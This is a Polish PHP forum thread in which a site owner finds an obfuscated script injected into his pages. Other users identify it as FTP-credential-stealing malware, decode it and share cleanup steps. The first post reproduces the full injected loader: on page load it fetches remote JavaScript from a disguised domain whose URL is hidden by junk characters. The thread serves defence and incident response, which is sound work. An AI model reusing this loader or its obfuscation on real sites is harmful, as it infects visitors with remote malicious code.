Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [JavaScript][HTML]Zabezpieczenia
Forum PHP.pl > Forum > Przedszkole
kosma
28.11.2009, 21:48:08
Witam!

Otwieram sobie dzisiaj stronę swego forum i strona nie działa - konsternacja...
Zaglądam na serwer, ściągam plik index.php gdyż to w nim sygnalizowany jest błąd i widzę, że na jego końcu doklejony jest nieznany mi kod. W katalogach utworzone zostały pliki index.html i w każdym z nich taki oto kod:

[HTML] pobierz, plaintext 
  1. <script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>
[HTML] pobierz, plaintext


Zauważyłem też że pliki javascript (js) też zostały zmodyfikowane lecz nie wiem o co gdyż zdążyłem je podmienić na właściwe zanim pomyślałem aby zerknąć co też zostało w nich doklejone.
Proszę mi powiedzieć cóż to jest, jak do tego doszło i jak się przed tym zabezpieczyć?
Blame
28.11.2009, 22:02:46
Zapewne trzymasz hasła w Total Commanderze, z którego wirus je wyciągnął i zmodyfikował pliki.
Co zrobić? Zmienić TC na np. FileZille (miliard razy lepsza) pozmieniać hasła do ftp i pousuwać złośliwy kod z plików.
kosma
28.11.2009, 22:07:05
Zgadza się.
Dziękuję za odpowiedź choć napędziłeś mi stracha!
darko
28.11.2009, 22:17:32
Wygląda na malware, doklejony do zdarzenia document.onload skrypt próbujący wykonać jakiś kod pobierany ze strony:

http://live.com.google.com.baidu-msn.com.b...om/cnet-cnn.com /about-ebay.com/

Jak uzyskałem ten adres?

Kod
<script>
var test = 'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@exclamation.gifm$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m ($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^';
document.write(test.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));
</script>


Być może Twoja strona jest ofiarą ataku typu js injection, ale aż tak się na tym nie znam. Zapytałbym administratora hostingu na Twoim miejscu, chociaż wątpię, żeby Ci coś konkretnego odpowiedział.

Pozdrawiam.
adrianozo
28.11.2009, 22:22:10
Nie dawno miałem to samo tylko trochę inny kod był dodawały.
Kroki jakie zrobiłem.

1. Przeniosłem się na FileZilla
2. Wyłączyłem opcje przetrzymywania hasła
3. Włączyłem opcje wymuszenia wyświetlania ukrytych plików
4. Poinformowałem usługodawcę hostingu
5. Usunąłem wszystkie pliki z ftp
6. Przeskanowałem komputer antywirusem, CCleaner'em i odkurzaczem
7. Zmieniłem hasła do ftp
8. Wrzuciłem pliki na serwer ftp
9. Cieszę się z dobrze działającej strony
b4x
20.12.2009, 02:44:51
Teraz każdy znany klient jest zagrożony - nie znam pochodzenie tego syfu.
Ale z tego co zauważyłem pliki są podmieniane z komputera ofiary bezpośrednio.

na FTP miałem dostęp tylko z 1 IP dopuszczony, a i tak przeszło, szukanie w procesach tego syfu, skanerami itp - nie dawało rezultatów - wszędzie niby 'czysto' - a to i tak dalej siedziało.


http://www.michell.pl/bez-kategorii/iframe...nload-function/
trzykas
28.01.2010, 02:33:08
Prosty skrypcik do usuniecia trojana JS-IllRedir-B z servera. Nalezy rownież zmienić hasła do FTP i nie używać Total Commandera do uploadow FTP.
Skrypt moze być łatwo zmodyfikowany do usuwania innych tego typu virusów dopisujących się do stron.

http://crafts.hopmart.pl/files/remov...r-b.php.tar.gz

Pozdrawiam.



fixuje Ill Redir-B i Ill Redir-C

Dodalem usuwanie IllRedir-D

Dodałem IllRedir-E
ppx
9.06.2010, 13:55:44
Witam,
U mnie na serwerze pojawił się Illredir-CB, niestety ale tym skryptem nie potrafie usunąć go.
Macie jeszcze jakieś rady co robić dalej?
Sillan
18.11.2010, 19:28:53
Witam,
może ktoś wie jak wyłączyć opcje przetrzymywanie haseł w Filezilli?
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.